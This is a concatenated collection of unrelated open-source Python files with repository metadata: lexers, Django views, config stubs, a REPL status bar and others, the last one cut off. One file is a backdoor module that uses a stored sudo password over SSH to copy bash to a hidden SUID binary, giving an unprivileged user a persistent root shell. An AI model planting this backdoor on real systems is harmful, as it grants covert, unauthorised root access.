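#   xprv2, xpub2 = bip32_private_derivation(xprv, "m/", "m/0'/1")
#   xpub3        = bip32_public_derivation(xpub2, "m/0'/1", "m/0'/1/2")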
def bip32_private_key(sequence, k, chain):
for i in sequence:
k, chain = CKD_priv(k, chain, i)
return SecretToASecret(k, True)
|
wozz/electrum-myr
|
lib/bitcoin.py
|
Python
|
gpl-3.0
| 24,716
|
b = 2
a = 1
|
asedunov/intellij-community
|
python/testData/mover/simple_afterDown.py
|
Python
|
apache-2.0
| 12
|
from chowdren.writers.events.system import get_loop_index_name
def use_deferred_collisions(converter):
return False
def init(converter):
converter.add_define('CHOWDREN_IS_TE')
converter.add_define('CHOWDREN_IS_TEED')
converter.add_define('CHOWDREN_QUICK_SCALE')
converter.add_define('CHOWDREN_POINT_FILTER')
converter.add_define('CHOWDREN_OBSTACLE_IMAGE')
converter.add_define('CHOWDREN_TEXTURE_GC')
converter.add_define('CHOWDREN_SPECIAL_POINT_FILTER')
converter.add_define('CHOWDREN_JOYSTICK2_CONTROLLER')
converter.add_define('CHOWDREN_FORCE_X360')
converter.add_define('CHOWDREN_FORCE_TRANSPARENT')
converter.add_define('CHOWDREN_FORCE_TEXT_LAYOUT')
converter.add_define('CHOWDREN_USE_GWEN')
def use_image_preload(converter):
return True
def use_image_flush(converter, frame):
return False
def use_edit_obj(converter):
return True
|
joaormatos/anaconda
|
Chowdren/configs/teed.py
|
Python
|
gpl-3.0
| 904
|
import Queue
import time
from bpython.repl import Interaction as BpythonInteraction
from manual_readline import char_sequences as rl_char_sequences
class StatusBar(BpythonInteraction):
"""StatusBar and Interaction for Repl
Passing of control back and forth between calls that use interact api
(notify, confirm, file_prompt) like bpython.Repl.write2file and events
on the main thread happens via those calls and self.wait_for_request_or_notify.
Calling one of these three is required for the main thread to regain control!
This is probably a terrible idea, and better would be rewriting this
functionality in a evented or callback style, but trying to integrate
bpython.Repl code.
"""
#TODO Remove dependence on bpython.Repl, it's more complicated than it's worth!
def __init__(self, initial_message='', permanent_text=""):
self._current_line = ''
self.cursor_offset_in_line = 0
self.in_prompt = False
self.in_confirm = False
self.prompt = ''
self._message = initial_message
self.message_start_time = time.time()
self.message_time = 3
self.permanent_text = permanent_text
self.response_queue = Queue.Queue(maxsize=1)
self.request_or_notify_queue = Queue.Queue()
@property
def has_focus(self):
return self.in_prompt or self.in_confirm
def message(self, msg):
self.message_start_time = time.time()
self._message = msg
def _check_for_expired_message(self):
if self._message and time.time() > self.message_start_time + self.message_time:
self._message = ''
def process_event(self, e):
"""Returns True if shutting down"""
assert self.in_prompt or self.in_confirm
if e in rl_char_sequences:
self.cursor_offset_in_line, self._current_line = rl_char_sequences[e](self.cursor_offset_in_line, self._current_line)
elif e == "":
raise KeyboardInterrupt()
elif e == "":
raise SystemExit()
elif self.in_prompt and e in ("\n", "\r"):
self.response_queue.put(self._current_line)
self.escape()
elif self.in_confirm:
if e in ('y', 'Y'):
self.response_queue.put(True)
else:
self.response_queue.put(False)
self.escape()
elif e == "\x1b":
self.response_queue.put(False)
self.escape()
else: # add normal character
#TODO factor this out, same in both process_event methods
self._current_line = (self._current_line[:self.cursor_offset_in_line] +
e +
self._current_line[self.cursor_offset_in_line:])
self.cursor_offset_in_line += 1
def escape(self):
"""unfocus from statusbar, clear prompt state, wait for notify call"""
self.wait_for_request_or_notify()
self.in_prompt = False
self.in_confirm = False
self.prompt = ''
self._current_line = ''
@property
def current_line(self):
self._check_for_expired_message()
if self.in_prompt:
return self.prompt + self._current_line
if self.in_confirm:
return self.prompt
if self._message:
return self._message
return self.permanent_text
def wait_for_request_or_notify(self):
try:
r = self.request_or_notify_queue.get(True, 1)
except Queue.Empty:
raise Exception('Main thread blocked because task thread not calling back')
return r
# interaction interface - should be called from other threads
def notify(self, msg, n=3):
self.message_time = n
self.message(msg)
self.request_or_notify_queue.put(msg)
# The methods below really ought to be called from threads other than the mainloop because they block
def confirm(self, q):
"""Expected to return True or False, given question prompt q"""
self.prompt = q
self.in_confirm = True
self.request_or_notify_queue.put(q)
return self.response_queue.get()
def file_prompt(self, s):
"""Expected to return a file name, given """
self.prompt = s
self.in_prompt = True
self.request_or_notify_queue.put(s)
r = self.response_queue.get()
return r
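# Usage sketch (hypothetical flow, not part of the original source): confirm() and
# file_prompt() are meant to be called from a task thread; they block on
# response_queue until the main thread feeds keystrokes through process_event(),
# which answers and then calls escape().
#   bar = StatusBar(permanent_text='ready')
#   # task thread:   overwrite = bar.confirm('Overwrite file? (y/n) ')
#   # main thread:   for key in pending_keys: bar.process_event(key)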
|
thomasballinger/scottwasright
|
scottsright/interaction.py
|
Python
|
mit
| 4,438
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from .generic import *
from criacao.forms import *
from criacao.models import *
from gerenciamento.models import *
logger = logging.getLogger(__name__)
class LinkView(GenericView):
def criar(self, request):
if request.method == 'POST':
form = LinkForm(request.POST)
if not form.is_valid():
data = {
'leftover' : {
'validation-error' : form.errors,
},
}
return data
name = request.POST['name']
url = request.POST['url']
link = Link(name=name, url=url)
try:
link.save()
except Exception, e:
logger.error(str(e))
data = {
'leftover' : {
'alert-success' : 'Link criado com sucesso!',
'redirect' : '/criacao/link/listar/'
},
}
return data
else:
museu, museu_nome = UTIL_informacoes_museu()
form = LinkForm()
data = {
'template' : {
'request' : request,
'museu_nome' : museu_nome,
'form' : form,
},
}
return data
def visualizar(self, request):
try:
pk = self.kwargs['key']
except Exception, e:
logger.error(str(e))
data = {
'leftover' : {
'alert-error' : 'Não foi possível processar essa visualização.',
}
}
else:
museu, museu_nome = UTIL_informacoes_museu()
link = Link.objects.get(pk=pk)
data = {
'template' : {
'request' : request,
'museu_nome' : museu_nome,
'link' : link,
},
}
finally:
return data
def editar(self, request):
if request.method == 'POST':
form = LinkForm(request.POST)
if not form.is_valid():
data = {
'leftover' : {
'validation-error' : form.errors,
},
}
return data
pk = self.kwargs['key']
name = request.POST['name']
url = request.POST['url']
link = Link.objects.get(pk=pk);
link.name=name
link.url=url
link.save()
data = {
'leftover' : {
'alert-success' : 'Link editada com sucesso!',
'redirect' : '/criacao/link/listar/'
},
}
return data
else:
try:
pk = self.kwargs['key']
except Exception, e:
logger.error(str(e))
data = {
'leftover' : {
'alert-error' : 'Não foi possível processar essa edição!',
}
}
else:
museu, museu_nome = UTIL_informacoes_museu()
link = Link.objects.get(pk=pk);
form = LinkForm(initial={
'name': link.name,
'url': link.url,
})
data = {
'template' : {
'request' : request,
'museu_nome' : museu_nome,
'link' : link,
'form' : form,
},
}
finally:
return data
def excluir(self, request):
try:
pk = self.kwargs['key']
except Exception, e:
logger.error(str(e))
data = {
'leftover' : {
'alert-error' : 'Não foi possível processar essa exclusão!',
}
}
else:
Link.objects.get(pk=pk).delete()
data = {
'leftover' : {
'alert-success' : 'Link deletado com sucesso!',
},
}
finally:
return data
def listar(self, request):
museu, museu_nome = UTIL_informacoes_museu()
links = Link.objects.order_by('-id')
try:
page = int(self.kwargs['key'])
except:
page = 1
finally:
links = paginate(obj=links, page=page, num_per_page=8)
data = {
'template' : {
'request' : request,
'museu' : museu,
'museu_nome' : museu_nome,
'links' : links,
},
}
return data
|
wendellpbarreto/tronco
|
criacao/views/link.py
|
Python
|
mit
| 3,423
|
# Try to import a module in the same directory as this file, but:
#from . import m1 # <==OK in package, not allowed in non-package mode in 2.X + 3.X
#import m1 # <==OK in program, fails to check package's own dir in 3.X
# set PYTHONPATH=c:\code
import dualpkg.m1 as m1 # <==works in both modes if sys.path includes the package root
def somefunc():
m1.somefunc()
print('m2.somefunc')
if __name__ == '__main__':
somefunc() # Self-test or top-level script code
|
simontakite/sysadmin
|
pythonscripts/learningPython/dualpkg/m2.py
|
Python
|
gpl-2.0
| 492
|
#
# Copyright (C) 2000 Stephen Davies
# Copyright (C) 2000 Stefan Seefeld
# All rights reserved.
# Licensed to the public under the terms of the GNU LGPL (>= 2),
# see the file COPYING for details.
#
from Synopsis.Formatters.HTML.Tags import *
from Default import Default
class DetailCommenter(Default):
"""Add annotation details to all declarations."""
def format_declaration(self, decl):
details = self.processor.documentation.details(decl, self.view)
return div(details or '', class_='doc')
|
stefanseefeld/synopsis
|
Synopsis/Formatters/HTML/Fragments/DetailCommenter.py
|
Python
|
lgpl-2.1
| 523
|
"""
sentry.filters.helpers
~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
# Widget api is pretty ugly
from __future__ import absolute_import
__all__ = ('get_filters',)
import logging
from django.utils.translation import ugettext_lazy as _
from sentry.conf import settings
from sentry.filters.base import TagFilter
from sentry.plugins import plugins
from sentry.models import ProjectOption, FilterKey
FILTER_CACHE = {}
TAG_FILTER_CACHE = {}
def get_filters(model=None, project=None):
filter_list = []
# Add builtins (specified with the FILTERS setting)
for class_path in settings.FILTERS:
if class_path not in FILTER_CACHE:
module_name, class_name = class_path.rsplit('.', 1)
try:
module = __import__(module_name, {}, {}, class_name)
cls = getattr(module, class_name)
except Exception:
logger = logging.getLogger('sentry.errors.filters')
logger.exception('Unable to import %s', class_path)
continue
FILTER_CACHE[class_path] = cls
filter_list.append(FILTER_CACHE[class_path])
if project:
for tag in ProjectOption.objects.get_value(project, 'tags', FilterKey.objects.all_keys(project)):
if tag not in TAG_FILTER_CACHE:
# Generate a new filter class because we are lazy and do
# not want to rewrite code
class new(TagFilter):
label = _(tag.replace('_', ' ').title())
column = tag
new.__name__ = '__%sGeneratedFilter' % str(tag)
TAG_FILTER_CACHE[tag] = new
filter_list.append(TAG_FILTER_CACHE[tag])
# Add plugin-provided filters
for plugin in plugins.all():
if not plugin.is_enabled(project):
continue
for filter_cls in plugin.get_filters(project):
if filter_cls not in filter_list:
filter_list.append(filter_cls)
# yield all filters which support ``model``
for filter_cls in filter_list:
if model and model not in filter_cls.types:
continue
yield filter_cls
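# Usage sketch (hypothetical arguments, not from the original source): get_filters()
# is a generator yielding filter classes, so callers typically materialise it:
#   filter_classes = list(get_filters(model=Group, project=project))
# where Group and project stand in for the event model and project being viewed.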
|
chayapan/django-sentry
|
src/sentry/filters/helpers.py
|
Python
|
bsd-3-clause
| 2,281
|
from backdoors.backdoor import *
class Shell(Backdoor):
prompt = Fore.RED + "(shell) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Shell backdoor..."
self.core = core
self.options = {
"name" : Option("name", "/bin/.bash", "name of the duplicated shell", True),
}
self.modules = {}
self.allow_modules = True
self.help_text = GOOD + "The shell backdoor is a priviledge escalation backdoor, similar to (but more powerful than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Unlike the SetUID backdoor though, this shell gives an unpriviledged user root priviledge with a full shell. Note that you need root access to initially deploy. To use, while SSHed in as an unpriviledged user, simply run \".bash -p\", and you will have root access."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S cp /bin/bash " + self.get_value("name") + " && echo " + self.core.curtarget.pword + " | sudo -S chmod 4755 " + self.get_value("name")
def do_exploit(self, args):
target = self.core.curtarget
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command(self.get_command())
print(GOOD + "Shell Backdoor attempted.")
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
sovaa/backdoorme
|
backdoors/escalation/shell.py
|
Python
|
mit
| 1,569
|
# -*- coding: utf-8 -*-
# The MIT License (MIT) - Copyright (c) 2016-2021 Dave Vandenbout.
import pytest
from skidl import Net, Pin
from .setup_teardown import setup_function, teardown_function
def test_net_merge_1():
a = Net("A")
b = Net("B")
a += 5 * Pin()
assert len(a) == 5
b += Pin(), Pin(), Pin()
assert len(b) == 3
a += b
assert len(a) == 8
|
xesscorp/skidl
|
tests/test_merge.py
|
Python
|
mit
| 386
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class KeyCredential(Model):
"""Active Directory Key Credential information.
:param start_date: Start date.
:type start_date: datetime
:param end_date: End date.
:type end_date: datetime
:param value: Key value.
:type value: str
:param key_id: Key ID.
:type key_id: str
:param usage: Usage. Acceptable values are 'Verify' and 'Sign'.
:type usage: str
:param type: Type. Acceptable values are 'AsymmetricX509Cert' and
'Symmetric'.
:type type: str
"""
_attribute_map = {
'start_date': {'key': 'startDate', 'type': 'iso-8601'},
'end_date': {'key': 'endDate', 'type': 'iso-8601'},
'value': {'key': 'value', 'type': 'str'},
'key_id': {'key': 'keyId', 'type': 'str'},
'usage': {'key': 'usage', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, start_date=None, end_date=None, value=None, key_id=None, usage=None, type=None):
self.start_date = start_date
self.end_date = end_date
self.value = value
self.key_id = key_id
self.usage = usage
self.type = type
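# Usage sketch (hypothetical values, not from the original source):
#   cred = KeyCredential(value='<base64-encoded key>', usage='Verify',
#                        type='AsymmetricX509Cert')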
|
v-iam/azure-sdk-for-python
|
azure-graphrbac/azure/graphrbac/models/key_credential.py
|
Python
|
mit
| 1,662
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.shell
~~~~~~~~~~~~~~~~~~~~~
Lexers for various shells.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import Lexer, RegexLexer, do_insertions, bygroups, include
from pygments.token import Punctuation, \
Text, Comment, Operator, Keyword, Name, String, Number, Generic
from pygments.util import shebang_matches
__all__ = ['BashLexer', 'BashSessionLexer', 'TcshLexer', 'BatchLexer',
'PowerShellLexer', 'ShellSessionLexer']
line_re = re.compile('.*?\n')
class BashLexer(RegexLexer):
"""
Lexer for (ba|k|)sh shell scripts.
.. versionadded:: 0.6
"""
name = 'Bash'
aliases = ['bash', 'sh', 'ksh', 'shell']
filenames = ['*.sh', '*.ksh', '*.bash', '*.ebuild', '*.eclass',
'.bashrc', 'bashrc', '.bash_*', 'bash_*', 'PKGBUILD']
mimetypes = ['application/x-sh', 'application/x-shellscript']
tokens = {
'root': [
include('basic'),
(r'`', String.Backtick, 'backticks'),
include('data'),
include('interp'),
],
'interp': [
(r'\$\(\(', Keyword, 'math'),
(r'\$\(', Keyword, 'paren'),
(r'\$\{#?', String.Interpol, 'curly'),
(r'\$#?(\w+|.)', Name.Variable),
],
'basic': [
(r'\b(if|fi|else|while|do|done|for|then|return|function|case|'
r'select|continue|until|esac|elif)(\s*)\b',
bygroups(Keyword, Text)),
(r'\b(alias|bg|bind|break|builtin|caller|cd|command|compgen|'
r'complete|declare|dirs|disown|echo|enable|eval|exec|exit|'
r'export|false|fc|fg|getopts|hash|help|history|jobs|kill|let|'
r'local|logout|popd|printf|pushd|pwd|read|readonly|set|shift|'
r'shopt|source|suspend|test|time|times|trap|true|type|typeset|'
r'ulimit|umask|unalias|unset|wait)\s*\b(?!\.)',
Name.Builtin),
(r'#.*\n', Comment),
(r'\\[\w\W]', String.Escape),
(r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
(r'[\[\]{}()=]', Operator),
(r'<<<', Operator), # here-string
(r'<<-?\s*(\'?)\\?(\w+)[\w\W]+?\2', String),
(r'&&|\|\|', Operator),
],
'data': [
(r'(?s)\$?"(\\\\|\\[0-7]+|\\.|[^"\\$])*"', String.Double),
(r'"', String.Double, 'string'),
(r"(?s)\$'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
(r"(?s)'.*?'", String.Single),
(r';', Punctuation),
(r'&', Punctuation),
(r'\|', Punctuation),
(r'\s+', Text),
(r'\d+(?= |\Z)', Number),
(r'[^=\s\[\]{}()$"\'`\\<&|;]+', Text),
(r'<', Text),
],
'string': [
(r'"', String.Double, '#pop'),
(r'(?s)(\\\\|\\[0-7]+|\\.|[^"\\$])+', String.Double),
include('interp'),
],
'curly': [
(r'\}', String.Interpol, '#pop'),
(r':-', Keyword),
(r'\w+', Name.Variable),
(r'[^}:"\'`$\\]+', Punctuation),
(r':', Punctuation),
include('root'),
],
'paren': [
(r'\)', Keyword, '#pop'),
include('root'),
],
'math': [
(r'\)\)', Keyword, '#pop'),
(r'[-+*/%^|&]|\*\*|\|\|', Operator),
(r'\d+#\d+', Number),
(r'\d+#(?! )', Number),
(r'\d+', Number),
include('root'),
],
'backticks': [
(r'`', String.Backtick, '#pop'),
include('root'),
],
}
def analyse_text(text):
if shebang_matches(text, r'(ba|z|)sh'):
return 1
if text.startswith('$ '):
return 0.2
class BashSessionLexer(Lexer):
"""
Lexer for simplistic shell sessions.
.. versionadded:: 1.1
"""
name = 'Bash Session'
aliases = ['console']
filenames = ['*.sh-session']
mimetypes = ['application/x-shell-session']
def get_tokens_unprocessed(self, text):
bashlexer = BashLexer(**self.options)
pos = 0
curcode = ''
insertions = []
for match in line_re.finditer(text):
line = match.group()
m = re.match(r'^((?:\(\S+\))?(?:|sh\S*?|\w+\S+[@:]\S+(?:\s+\S+)'
r'?|\[\S+[@:][^\n]+\].+)[$#%])(.*\n?)' , line)
if m:
# To support output lexers (say diff output), the output
# needs to be broken by prompts whenever the output lexer
# changes.
if not insertions:
pos = match.start()
insertions.append((len(curcode),
[(0, Generic.Prompt, m.group(1))]))
curcode += m.group(2)
elif line.startswith('>'):
insertions.append((len(curcode),
[(0, Generic.Prompt, line[:1])]))
curcode += line[1:]
else:
if insertions:
toks = bashlexer.get_tokens_unprocessed(curcode)
for i, t, v in do_insertions(insertions, toks):
yield pos+i, t, v
yield match.start(), Generic.Output, line
insertions = []
curcode = ''
if insertions:
for i, t, v in do_insertions(insertions,
bashlexer.get_tokens_unprocessed(curcode)):
yield pos+i, t, v
class ShellSessionLexer(Lexer):
"""
Lexer for shell sessions that works with different command prompts
.. versionadded:: 1.6
"""
name = 'Shell Session'
aliases = ['shell-session']
filenames = ['*.shell-session']
mimetypes = ['application/x-sh-session']
def get_tokens_unprocessed(self, text):
bashlexer = BashLexer(**self.options)
pos = 0
curcode = ''
insertions = []
for match in line_re.finditer(text):
line = match.group()
m = re.match(r'^((?:\[?\S+@[^$#%]+\]?\s*)[$#%])(.*\n?)', line)
if m:
# To support output lexers (say diff output), the output
# needs to be broken by prompts whenever the output lexer
# changes.
if not insertions:
pos = match.start()
insertions.append((len(curcode),
[(0, Generic.Prompt, m.group(1))]))
curcode += m.group(2)
else:
if insertions:
toks = bashlexer.get_tokens_unprocessed(curcode)
for i, t, v in do_insertions(insertions, toks):
yield pos+i, t, v
yield match.start(), Generic.Output, line
insertions = []
curcode = ''
if insertions:
for i, t, v in do_insertions(insertions,
bashlexer.get_tokens_unprocessed(curcode)):
yield pos+i, t, v
class BatchLexer(RegexLexer):
"""
Lexer for the DOS/Windows Batch file format.
.. versionadded:: 0.7
"""
name = 'Batchfile'
aliases = ['bat', 'batch', 'dosbatch', 'winbatch']
filenames = ['*.bat', '*.cmd']
mimetypes = ['application/x-dos-batch']
flags = re.MULTILINE | re.IGNORECASE
tokens = {
'root': [
# Lines can start with @ to prevent echo
(r'^\s*@', Punctuation),
(r'^(\s*)(rem\s.*)$', bygroups(Text, Comment)),
(r'".*?"', String.Double),
(r"'.*?'", String.Single),
# If made more specific, make sure you still allow expansions
# like %~$VAR:zlt
(r'%%?[~$:\w]+%?', Name.Variable),
(r'::.*', Comment), # Technically :: only works at BOL
(r'\b(set)(\s+)(\w+)', bygroups(Keyword, Text, Name.Variable)),
(r'\b(call)(\s+)(:\w+)', bygroups(Keyword, Text, Name.Label)),
(r'\b(goto)(\s+)(\w+)', bygroups(Keyword, Text, Name.Label)),
(r'\b(set|call|echo|on|off|endlocal|for|do|goto|if|pause|'
r'setlocal|shift|errorlevel|exist|defined|cmdextversion|'
r'errorlevel|else|cd|md|del|deltree|cls|choice)\b', Keyword),
(r'\b(equ|neq|lss|leq|gtr|geq)\b', Operator),
include('basic'),
(r'.', Text),
],
'echo': [
# Escapes only valid within echo args?
(r'\^\^|\^<|\^>|\^\|', String.Escape),
(r'\n', Text, '#pop'),
include('basic'),
(r'[^\'"^]+', Text),
],
'basic': [
(r'".*?"', String.Double),
(r"'.*?'", String.Single),
(r'`.*?`', String.Backtick),
(r'-?\d+', Number),
(r',', Punctuation),
(r'=', Operator),
(r'/\S+', Name),
(r':\w+', Name.Label),
(r'\w:\w+', Text),
(r'([<>|])(\s*)(\w+)', bygroups(Punctuation, Text, Name)),
],
}
class TcshLexer(RegexLexer):
"""
Lexer for tcsh scripts.
.. versionadded:: 0.10
"""
name = 'Tcsh'
aliases = ['tcsh', 'csh']
filenames = ['*.tcsh', '*.csh']
mimetypes = ['application/x-csh']
tokens = {
'root': [
include('basic'),
(r'\$\(', Keyword, 'paren'),
(r'\$\{#?', Keyword, 'curly'),
(r'`', String.Backtick, 'backticks'),
include('data'),
],
'basic': [
(r'\b(if|endif|else|while|then|foreach|case|default|'
r'continue|goto|breaksw|end|switch|endsw)\s*\b',
Keyword),
(r'\b(alias|alloc|bg|bindkey|break|builtins|bye|caller|cd|chdir|'
r'complete|dirs|echo|echotc|eval|exec|exit|fg|filetest|getxvers|'
r'glob|getspath|hashstat|history|hup|inlib|jobs|kill|'
r'limit|log|login|logout|ls-F|migrate|newgrp|nice|nohup|notify|'
r'onintr|popd|printenv|pushd|rehash|repeat|rootnode|popd|pushd|'
r'set|shift|sched|setenv|setpath|settc|setty|setxvers|shift|'
r'source|stop|suspend|source|suspend|telltc|time|'
r'umask|unalias|uncomplete|unhash|universe|unlimit|unset|unsetenv|'
r'ver|wait|warp|watchlog|where|which)\s*\b',
Name.Builtin),
(r'#.*', Comment),
(r'\\[\w\W]', String.Escape),
(r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
(r'[\[\]{}()=]+', Operator),
(r'<<\s*(\'?)\\?(\w+)[\w\W]+?\2', String),
(r';', Punctuation),
],
'data': [
(r'(?s)"(\\\\|\\[0-7]+|\\.|[^"\\])*"', String.Double),
(r"(?s)'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
(r'\s+', Text),
(r'[^=\s\[\]{}()$"\'`\\;#]+', Text),
(r'\d+(?= |\Z)', Number),
(r'\$#?(\w+|.)', Name.Variable),
],
'curly': [
(r'\}', Keyword, '#pop'),
(r':-', Keyword),
(r'\w+', Name.Variable),
(r'[^}:"\'`$]+', Punctuation),
(r':', Punctuation),
include('root'),
],
'paren': [
(r'\)', Keyword, '#pop'),
include('root'),
],
'backticks': [
(r'`', String.Backtick, '#pop'),
include('root'),
],
}
class PowerShellLexer(RegexLexer):
"""
For Windows PowerShell code.
.. versionadded:: 1.5
"""
name = 'PowerShell'
aliases = ['powershell', 'posh', 'ps1', 'psm1']
filenames = ['*.ps1','*.psm1']
mimetypes = ['text/x-powershell']
flags = re.DOTALL | re.IGNORECASE | re.MULTILINE
keywords = (
'while validateset validaterange validatepattern validatelength '
'validatecount until trap switch return ref process param parameter in '
'if global: function foreach for finally filter end elseif else '
'dynamicparam do default continue cmdletbinding break begin alias \\? '
'% #script #private #local #global mandatory parametersetname position '
'valuefrompipeline valuefrompipelinebypropertyname '
'valuefromremainingarguments helpmessage try catch throw').split()
operators = (
'and as band bnot bor bxor casesensitive ccontains ceq cge cgt cle '
'clike clt cmatch cne cnotcontains cnotlike cnotmatch contains '
'creplace eq exact f file ge gt icontains ieq ige igt ile ilike ilt '
'imatch ine inotcontains inotlike inotmatch ireplace is isnot le like '
'lt match ne not notcontains notlike notmatch or regex replace '
'wildcard').split()
verbs = (
'write where wait use update unregister undo trace test tee take '
'suspend stop start split sort skip show set send select scroll resume '
'restore restart resolve resize reset rename remove register receive '
'read push pop ping out new move measure limit join invoke import '
'group get format foreach export expand exit enter enable disconnect '
'disable debug cxnew copy convertto convertfrom convert connect '
'complete compare clear checkpoint aggregate add').split()
commenthelp = (
'component description example externalhelp forwardhelpcategory '
'forwardhelptargetname functionality inputs link '
'notes outputs parameter remotehelprunspace role synopsis').split()
tokens = {
'root': [
# we need to count pairs of parentheses for correct highlight
# of '$(...)' blocks in strings
(r'\(', Punctuation, 'child'),
(r'\s+', Text),
(r'^(\s*#[#\s]*)(\.(?:%s))([^\n]*$)' % '|'.join(commenthelp),
bygroups(Comment, String.Doc, Comment)),
(r'#[^\n]*?$', Comment),
(r'(&lt;|<)#', Comment.Multiline, 'multline'),
(r'@"\n', String.Heredoc, 'heredoc-double'),
(r"@'\n.*?\n'@", String.Heredoc),
# escaped syntax
(r'`[\'"$@-]', Punctuation),
(r'"', String.Double, 'string'),
(r"'([^']|'')*'", String.Single),
(r'(\$|@@|@)((global|script|private|env):)?\w+',
Name.Variable),
(r'(%s)\b' % '|'.join(keywords), Keyword),
(r'-(%s)\b' % '|'.join(operators), Operator),
(r'(%s)-[a-z_]\w*\b' % '|'.join(verbs), Name.Builtin),
(r'\[[a-z_\[][\w. `,\[\]]*\]', Name.Constant), # .net [type]s
(r'-[a-z_]\w*', Name),
(r'\w+', Name),
(r'[.,;@{}\[\]$()=+*/\\&%!~?^`|<>-]|::', Punctuation),
],
'child': [
(r'\)', Punctuation, '#pop'),
include('root'),
],
'multline': [
(r'[^#&.]+', Comment.Multiline),
(r'#(&gt;|>)', Comment.Multiline, '#pop'),
(r'\.(%s)' % '|'.join(commenthelp), String.Doc),
(r'[#&.]', Comment.Multiline),
],
'string': [
(r"`[0abfnrtv'\"$`]", String.Escape),
(r'[^$`"]+', String.Double),
(r'\$\(', Punctuation, 'child'),
(r'""', String.Double),
(r'[`$]', String.Double),
(r'"', String.Double, '#pop'),
],
'heredoc-double': [
(r'\n"@', String.Heredoc, '#pop'),
(r'\$\(', Punctuation, 'child'),
(r'[^@\n]+"]', String.Heredoc),
(r".", String.Heredoc),
]
}
|
aeppert/diaphora
|
pygments/lexers/shell.py
|
Python
|
gpl-2.0
| 15,794
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Provide a class for storing project information.
Besides providing properties for storing data, the class also provides
packing, unpacking and other helper methods to provide basic manipulation
of projects (e.g. saving/loading from drive).
'''
import pickle
import os.path
import gobject
__author__ = "Mac Ryan"
__copyright__ = "Copyright 2011, Mac Ryan"
__license__ = "GPL v3"
__maintainer__ = "Mac Ryan"
__email__ = "quasipedia@gmail.com"
__status__ = "Development"
class Project(gobject.GObject):
'''
A project object stores all available information on a given project.
Normally used as a singleton; it's a gobject.GObject child in order to be
able to generate signals (see the bottom of this module).
'''
DEFAULT_EXTENSION = 'sav'
# Just to keep the door open for possible future non backward-
# compatible changes...
SCHEMA_VERSION = '1.0'
# All properties of the objects that need to be saved (and loaded)
SAVE_MASK = ['SCHEMA_VERSION',
'project_settings',
'vclock_settings',
'electronics_settings',
'supersequence']
# Project settings grouping
PRJ_STTNGS_PHRASES = ('clock', 'resolution', 'approx_method')
def __init__(self):
self.__gobject_init__()
self.__reset_project()
self.unsaved_flag = False
def __reset_project(self):
'''
Reset all those properties of the object that are project-specific.
'''
for property in self.SAVE_MASK:
if property != 'SCHEMA_VERSION': # don't overwrite class property!
setattr(self, property, None)
self.saved_state = self.__get_masked_dict()
self.last_save_fname = None
self.unsaved_flag = False
def __get_masked_dict(self):
'''
Returns a dictionary with the properties indicated in "SAVE_MASK".
'''
dict_ = {}
for pr in self.SAVE_MASK:
dict_[pr] = getattr(self, pr)
return dict_
def broadcast_change(self, skip_flag_setting=False):
'''
Check current values of the properties in SAVE_MASK against their
values on last broadcast_change call. If the state is changed, it emits
the signal "project_updated" with a dictionary of the properties that
have changed as a parameter.
It also set the "unsaved_flag" to True, unless the parameter
'skip_flag_setting' is set to True (useful for when project is first
loaded).
Return True if the state of the project has changed.
'''
has_changed = False
new_state = self.__get_masked_dict()
if self.saved_state != new_state:
has_changed = True
if not skip_flag_setting:
self.unsaved_flag = True
data = {}
for pr in self.SAVE_MASK:
if self.saved_state[pr] != new_state[pr]:
data[pr] = new_state[pr]
self.saved_state = new_state
self.emit("project_updated", data)
return has_changed
def is_populated(self):
'''
Return True if the project is populated.
'''
for pr in self.SAVE_MASK:
if pr != 'SCHEMA_VERSION' and getattr(self, pr) != None:
return True
return False
def is_unsaved(self):
'''
Return True if the project has unsaved changes.
'''
return self.unsaved_flag
def get_project_name(self):
'''
Return a suitable project name for the project.
(Typically used in the main window title
'''
if not self.is_populated():
return None
if self.last_save_fname == None:
name = '<new project>'
else:
name = os.path.split(self.last_save_fname)[1]
return name
def save(self, fname=None):
'''
Save to disk the essential data on the project. If fname is not given,
uses the name used on the last save operation.
'''
# If the file has not been given an extension, use the default one
if fname and '.' not in os.path.split(fname)[1]:
fname += '.' + self.DEFAULT_EXTENSION
# Automatic save (no file name selection)
if fname == None:
assert self.last_save_fname != None
fname = self.last_save_fname
prj = dict()
for property in self.SAVE_MASK:
prj[property] = getattr(self, property)
try:
file_ = open(fname, 'w')
except:
problem_description = '''It was <b>impossible to open the requested
file</b>. Hint: are you sure the saved file has the right
permissions for <i>Chasy</i> to open it?'''
self.emit("disk_operation_problem", problem_description)
return -1
# Protocol 0 (the default) *will* generate problems with cyclic
# references between sequence and elements.
pickle.dump(prj, file_, pickle.HIGHEST_PROTOCOL)
file_.close()
self.last_save_fname = fname
self.unsaved_flag = False
# Need to call this to update main window title
self.emit("project_updated", None)
def load(self, fname, installed_modules):
'''
Load a project from disk and regenerate the environment to match it.
'installed_modules' is a list of the installed clock modules on the
system. Trying to load a project based on an uninstalled module will
generate a non-fatal error.
'''
self.__reset_project()
try:
file_ = open(fname, 'r')
except:
problem_description = '''It was <b>impossible to open the requested
